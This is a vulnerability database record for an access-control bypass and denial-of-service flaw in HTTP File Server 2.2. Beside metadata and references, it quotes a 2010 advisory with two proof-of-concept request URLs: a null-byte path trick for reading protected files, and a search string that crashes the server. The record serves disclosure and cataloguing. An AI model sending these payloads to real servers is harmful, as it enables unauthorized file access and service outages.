Details of VAR-E-201004-0608

ID

VAR-E-201004-0608

EDB ID

33841

TITLE

HTTP File Server 2.2 - Security Bypass / Denial of Service - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 33841

DESCRIPTION

HTTP File Server 2.2 - Security Bypass / Denial of Service.. remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 33841

AFFECTED PRODUCTS

vendor:	http	model:	file server	scope:	eq	version:	2.2	Trust: 1.6
vendor:	http	model:	file server http file server 2.2e	scope:	-	version:	-	Trust: 0.3
vendor:	http	model:	file server http file server 2.2c	scope:	-	version:	-	Trust: 0.3
vendor:	http	model:	file server http file server 2.2b	scope:	-	version:	-	Trust: 0.3
vendor:	http	model:	file server http file server 2.2a	scope:	-	version:	-	Trust: 0.3
vendor:	http	model:	file server http file server	scope:	eq	version:	2.2	Trust: 0.3
vendor:	http	model:	file server http file server 2.2f	scope:	ne	version:	-	Trust: 0.3

sources: BID: 39544 // EXPLOIT-DB: 33841 // EDBNET: 55251

EXPLOIT

source: https://www.securityfocus.com/bid/39544/info

HTTP File Server is prone to multiple vulnerabilities including a security-bypass issue and a denial-of-service issue.

Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions.

http://www.example.com/protected_folder/secret_file.txt%00
http://www.example.com/?search=%25%25

Trust: 1.0

sources: EXPLOIT-DB: 33841

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 33841

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 33841

TYPE

Security Bypass / Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 33841

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 33841

EXTERNAL IDS

db:	BID	id:	39544	Trust: 1.9
db:	EXPLOIT-DB	id:	33841	Trust: 1.6
db:	EDBNET	id:	55251	Trust: 0.6

sources: BID: 39544 // EXPLOIT-DB: 33841 // EDBNET: 55251

REFERENCES

url:	https://www.securityfocus.com/bid/39544/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/33841/	Trust: 0.6
url:	http://www.rejetto.com/hfs/?f=intro	Trust: 0.3
url:	http://aluigi.altervista.org/adv/hfsref-adv.txt	Trust: 0.3

sources: BID: 39544 // EXPLOIT-DB: 33841 // EDBNET: 55251

SOURCES

db:	BID	id:	39544
db:	EXPLOIT-DB	id:	33841
db:	EDBNET	id:	55251

LAST UPDATE DATE

2022-07-27T09:43:23.668000+00:00

SOURCES UPDATE DATE

db:

BID

id:

39544

date:

2010-04-19T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	39544	date:	2010-04-19T00:00:00
db:	EXPLOIT-DB	id:	33841	date:	2010-04-19T00:00:00
db:	EDBNET	id:	55251	date:	2010-04-19T00:00:00